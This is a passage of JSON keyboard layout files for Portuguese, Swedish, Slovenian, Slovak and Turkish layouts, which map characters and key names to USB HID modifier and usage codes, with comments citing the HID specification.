\"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"`\":\"02,00,2e\",\n \"^\":\"02,00,30\",\n \"*\":\"02,00,31\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"$\":\"40,00,21\",\n \"{\":\"40,00,24\",\n \"[\":\"40,00,25\",\n \"]\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"~\":\"40,00,30\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,30\",\n \"COMMAND-CTRL\":\"40,00,30\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,30\"\n}" }, { "path": "languages/pt.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"+\":\"00,00,2f\",\n \"~\":\"00,00,32\",\n \"\\\\\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"*\":\"02,00,2f\",\n \"`\":\"02,00,30\",\n \"^\":\"02,00,32\",\n \"|\":\"02,00,35\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"{\":\"40,00,24\",\n \"[\":\"40,00,25\",\n \"]\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,27\",\n \"COMMAND-CTRL\":\"40,00,27\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,27\"\n}" }, { "path": "languages/se.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"+\":\"00,00,2d\",\n \"'\":\"00,00,31\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"~\":\"02,00,20\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"`\":\"02,00,2e\",\n \"^\":\"02,00,30\",\n \"*\":\"02,00,31\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"$\":\"40,00,21\",\n \"{\":\"40,00,24\",\n \"[\":\"40,00,25\",\n \"]\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"\\\\\":\"40,00,2d\",\n \"|\":\"40,00,64\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,64\",\n \"COMMAND-CTRL\":\"40,00,64\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,64\"\n}" }, { "path": "languages/si.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"+\":\"00,00,2e\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"*\":\"02,00,2e\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"{\":\"40,00,05\",\n \"[\":\"40,00,09\",\n \"]\":\"40,00,0a\",\n \"}\":\"40,00,11\",\n \"\\\\\":\"40,00,14\",\n \"@\":\"40,00,19\",\n \"|\":\"40,00,1a\",\n \"~\":\"40,00,1e\",\n \"^\":\"40,00,20\",\n \"`\":\"40,00,24\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,24\",\n \"COMMAND-CTRL\":\"40,00,24\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,24\"\n}" }, { "path": "languages/sk.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\" Slovak QWERTZ version made by Andrej Šimko\",\n \"__comment\":\" Note that some special characters use leftCtrl+leftAlt+[key]\",\n \"__comment\":\" Special Slovak characters like ľščťžýáíéúäô are not included\",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"+\":\"00,00,1e\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"CTRL-ALT\":\"05,00,00\",\n \"=\":\"00,00,2d\",\n \";\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"1\":\"02,00,1e\",\n \"2\":\"02,00,1f\",\n \"3\":\"02,00,20\",\n \"4\":\"02,00,21\",\n \"5\":\"02,00,22\",\n \"6\":\"02,00,23\",\n \"7\":\"02,00,24\",\n \"8\":\"02,00,25\",\n \"9\":\"02,00,26\",\n \"0\":\"02,00,27\",\n \"\\\\\":\"05,00,14\",\n \"%\":\"02,00,2d\",\n \"/\":\"02,00,2f\",\n \"(\":\"02,00,30\",\n \"'\":\"05,00,13\",\t\n \")\":\"02,00,31\",\n \"\\\"\":\"02,00,33\",\n \"!\":\"02,00,34\",\n \"?\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \"|\":\"05,00,1a\",\n \"#\":\"05,00,1b\",\n \"&\":\"05,00,06\",\n \"@\":\"05,00,19\",\n \"$\":\"05,00,33\",\n \"*\":\"05,00,38\",\n \"{\":\"05,00,05\",\n \"}\":\"05,00,11\",\n \"[\":\"05,00,09\",\n \"]\":\"05,00,0a\",\n \"~\":\"05,00,1e\",\n \"^\":\"05,00,20\",\n \"<\":\"05,00,36\",\n \">\":\"05,00,37\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"COMMAND-CTRL-SHIFT\":\"12,00,00\",\n \"COMMAND-CTRL\":\"12,00,00\",\n \"COMMAND-OPTION-SHIFT'\":\"12,00,00\"\n}" }, { "path": "languages/tr.json", "content": "{\n \"__comment\": \"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\": \" \",\n \"__comment\": \"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\": \" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\": \" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\": \" \",\n \"__comment\": \"Definition of these 3 bytes can be found\",\n \"__comment\": \" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\": \" of document Device Class Definition for HID Version 1.11\",\n \"__comment\": \" - byte 1: Modifier keys\",\n \"__comment\": \" - byte 2: Reserved\",\n \"__comment\": \" - byte 3: Keycode 1\",\n \"__comment\": \" \",\n \"__comment\": \"Both documents can be obtained from link here\",\n \"__comment\": \" http://www.usb.org/developers/hidpage/\",\n \"__comment\": \" \",\n \"__comment\": \"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\": \" \",\n \"CTRL\": \"01,00,00\",\n \"CONTROL\": \"01,00,00\",\n \"SHIFT\": \"02,00,00\",\n \"ALT\": \"04,00,00\",\n \"GUI\": \"08,00,00\",\n \"WINDOWS\": \"08,00,00\",\n \"CTRL-ALT\": \"05,00,00\",\n \"CTRL-SHIFT\": \"03,00,00\",\n \"ALT-SHIFT\": \"06,00,00\",\n \"__comment\": \"Below 5 key combinations are for Mac OSX\",\n \"__comment\": \"Example: (COMMAND-OPTION SHIFT t) to open terminal\",\n \"COMMAND\": \"08,00,00\",\n \"COMMAND-CTRL\": 